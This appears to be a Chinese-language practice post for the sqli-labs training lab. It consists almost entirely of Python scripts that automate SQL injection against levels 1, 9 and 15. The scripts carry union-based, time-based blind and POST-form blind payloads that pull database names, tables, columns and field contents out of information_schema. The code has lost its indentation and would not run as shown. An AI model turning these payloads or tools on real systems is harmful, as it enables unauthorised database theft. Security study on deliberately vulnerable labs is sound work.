虽然这个很简单,但是还是写个脚本跑一下
Less-1from http.client import PROCESSING, responses
from re import I, T
from typing import FrozenSet
from bs4.dammit import xml_encoding
from bs4.element import ProcessingInstruction
import requests
import urllib.request
from colorama import init, Fore, Back, Style
from requests.api import get
import bs4
import lxml
# payload = 'abcdefghijklmnopqrstuvwxyz~!@#$%^&*()<>?|,./`'
'''打开网页'''
def send_request(url):
res = urllib.request.urlopen(url+ '--+')
result = str(res.read().decode('utf-8'))
# print(result) 打印源码
return result
'''order by 查看注入点'''
def order_by_N(url):
flag = 0
for i in range(1,101):
# print(i)
sql = url + 'order by ' +str(i) + '--+'
# print(i)
result = requests.get(sql)
# result1= send_request( url + 'order by ' +str(i) + '--+')
# print(result) 打印200 状态码
# print(sql) 打印SQL语句
soup = bs4.BeautifulSoup(result.content,'lxml')
# print(soup.prettify())
content = soup.find(size = '3')
# print(str(content.text))
a='Login' in str(content.text)
# print(a)
if a == True:
flag = i
print(i)
elif a == False:
break
print("检测到注入点"+str(i-1))
return flag
'''获得数据库名称'''
def get_database(sql_url):
sql_database=sql_url+'union select 1,2,group_concat(schema_name) from information_schema.schemata --+'
print("[正在执行SQL语句:]"+sql_database)
result = requests.get(sql_database)
soup = bs4.BeautifulSoup(result.content,'lxml')
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
# 打印出来了 数据库
'''爆破数据库'''
def get_table(sql_url):
I = input("请输入想要注入的数据库:")
sql_table = sql_url+ " union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = '%s' --+" %I
print("[正在执行SQL语句:]"+sql_table)
result = requests.get(sql_table)
soup = bs4.BeautifulSoup(result.content,'lxml')
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
# 打印出来 表的列表
# '''爆破数据库的表'''
# def get_column(sql_url):
J = input("请输入想要查看到表:")
sql_column= sql_url+ "union select 1,2,group_concat(column_name) from information_schema.columns where table_name = '%s' --+" %J
print("[正在执行SQL语句:]" + sql_column)
result = requests.get(sql_column)
soup = bs4.BeautifulSoup(result.content,'lxml')
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
# '''爆破数据库的字段,获取字段内容'''
# def get_content(sql_url):
K = input("请输入你想要查看到字段内容:")
sql_content = sql_url + "union select 1,2,group_concat(%s) from %s.%s --+ " %(K,I,J)
print("[正在执行SQL语句:]"+sql_content)
result = requests.get(sql_content)
soup = bs4.BeautifulSoup(result.content,'lxml')
try:
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
except Exception:
print("你输入的有错误哦!!")
if __name__=="__main__":
# url = str(input("输入存在SQL漏洞给的网址:"))
url = "http://127.0.0.1/sqli-labs/Less-1/?id=1'"
# sql_url = str(input("字符型SQL输入:"))
sql_url = " http://127.0.0.1/sqli-labs/Less-1/?id=-1'"
send_request(url)
order_by_N(url)
get_database(sql_url)
get_table(sql_url)
# get_column(sql_url)
# get_content(sql_url)
Less-9
时间盲注
import requests
import time
import datetime
#匹配时间较长 耐心等待 耐心等待 !!!!!
url = "http://127.0.0.1/sqli-labs/Less-9/"
p1 = 'abcdefghijklmnopqrstuvwxyz'
#获取数据库长度
def database_len():
for i in range(1,10):
payload = "?id=1' and if(length(database())>%s,sleep(4),0)--+"%i
url1 = url +payload
#print(url1)
time1 =time.time()
r=requests.get(url=url1)
time2=time.time()
time3 = time2-time1
if time3 >= 4:
print(i)
else:
print(i)
break
print('数据库长度为:',i)
#database_len()
#获取数据库名
def datebase_name():
database_name=''
for i in range(1,9):
for j in p1:
payload="?id=1' and if(substr(database(),%s,1)='%s',sleep(4),1)--+" %(i,j)
url1=url+payload
#print(url1)
time1=time.time()
r=requests.get(url=url1)
time2=time.time()
time3=time2-time1
if time3 >= 4:
database_name += j
# print(database_name)
break
n = database_name
print('数据库名字为:'+n)
#datebase_name()
#获取表
def tables_name():
global table4
table1=''
table2=''
table3=''
table4=''
for i in range(5):
for j in range(1,8):
for t in p1:
payload="?id=1' and sleep(if((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%s,1)='%s'),3,0)) --+"%(i,j,t)
url1=url+payload
#print(url1)
time1=time.time()
r=requests.get(url=url1)
time2=time.time()
time3=time2-time1
if time3 >= 3:
if i == 0:
table1 +=t
# print('第一个表为:',table1)
elif i == 1:
table2 += t
# print('第二个表为:',table2)
elif i == 2:
table3 +=t
# print('第三个表为:',table3)
elif i == 3:
table4 += t
# print('第四个表为:',table4)
else:
break
print('第一个表为' + table1)
print('第二个表为' + table2)
print('第三个表为' + table3)
print('第四个表为' + table4)
#tables_name()
#获取表中的字段 和 内容
def table_column():
global column3
column1=''
column2=''
column3=''
f=str(input("请输入表的名称:"))
for i in range(3):
for j in range(1,10):
for t in p1:
payload="?id=1' and sleep(if((mid((select column_name from information_schema.columns where table_schema = 'security' and table_name='%s' limit %s,1),%s,1)='%s'),5,0)) --+"%(f,i,j,t)
url1 =url+payload
#print(url1)
time1 = time.time()
r = requests.get(url=url1)
time2 = time.time()
time3 = time2 - time1
if time3 >= 5:
if i == 0:
column1 += t
# print('字段一为:'+column1)
elif i == 1:
column2 += t
# print('字段二为:'+column2)
elif i == 2:
column3 += t
# print('字段三为:'+column3)
else:
break
# print(column1,column2,column3)
print('字段一为:'+column1)
print('字段二为:'+column2)
print('字段三为:',column3)
#table_column()
# def s_content():
content1=''
f1= str(input("请输入字段名称:"))
# f= str(input("请输入表名称:"))
for i in range(20):
for t in p1:
payload = "?id=1' and sleep(if((mid((select %s from %s limit 7,1),%s,1)='%s'),3,0)) --+"%(f1,f,i,t)
url1 =url+payload
#print(url1)
time1=time.time()
r = requests.get(url=url1)
time2 = time.time()
time3 = time2-time1
if time3 >=3:
content1 += t
# print('字段一内容为:'+content1)
break
print('字段内容为:'+content1)
start_time=time.time()
database_len()
datebase_name()
tables_name()
table_column()
# s_content()
Less-15
import requests,datetime
import time
##匹配时间较长 耐心等待 耐心等待 !!!!!
url = "http://127.0.0.1/sqli-labs/Less-15/"
char = "abcdefghijklmnopqrstuvwxyz_"
print("start!")
def get_database(url,char):
for i in range(0,7):
database = ""
for j in range(1,20):
for str in char:
# print(str)
time1 = time.time()
data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
res = requests.post(url,data=data)
# print(res.text)
time2 = time.time()
sec = time2 - time1
if sec<0.2:
database += str
print(database)
break
print("the %d database: "%i)
print(database)
print("end!")
def tabele_name(url,char):
for i in range(0,4):
table_name = ""
for j in range(1,10):
for str in char:
# print(str)
time1 = time.time()
# data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
data = {'uname':"admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
res = requests.post(url,data=data)
# print(res.text)
time2 = time.time()
sec = time2 - time1
if sec<0.2:
table_name += str
print(table_name)
break
print("the %d table_name: "%i)
print(table_name)
print("end!")
'''获得 字段 + 内容 '''
def get_column(url,char):
I = input("请输入表名:")
for i in range(0,4):
column_name = ""
for j in range(1,10):
for str in char:
# print(str)
time1 = time.time()
# data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
# data = {'uname':"admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
data = {'uname':"admin'and If((mid((select column_name from information_schema.columns where table_schema = 'security' and table_name='%s' limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(I,i,j,str),'passwd':"1"}
res = requests.post(url,data=data)
# print(res.text)
time2 = time.time()
sec = time2 - time1
if sec<0.2:
column_name += str
print(column_name)
break
print("the %d column_name: "%i)
print(column_name)
print("end!")
# def get_content(url,char):
# I = input("请输入表名:")
M = input("请输入字段名:")
for i in range(0,4):
end_content = ""
for j in range(1,10):
for str in char:
# print(str)
time1 = time.time()
# data = {'uname':"admin'and If((mid((select schema_name from information_schema.schemata limit %d,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
# data = {'uname':"admin'and If((mid((select table_name from information_schema.tables where table_schema=database() limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(i,j,str),'passwd':"1"}
# data = {'uname':"admin'and If((mid((select column_name from information_schema.columns where table_schema = 'security' and table_name='%s' limit %s,1),%d,1))='%s',1,sleep(0.2))#"%(I,i,j,str),'passwd':"1"}
data = {'uname':"admin'and If((mid((select %s from %s limit %s,1),%d,1))='%s',1,sleep(0.2))#" %(M,I,i,j,str),'passwd':"1"}
res = requests.post(url,data=data)
# print(res.text)
time2 = time.time()
sec = time2 - time1
if sec<0.2:
end_content += str
print(end_content)
break
print("the %d end_content: "%i)
print(end_content)
print("end!")
get_database(url,char)
tabele_name(url,char)
get_column(url,char)
# get_content(url,char)
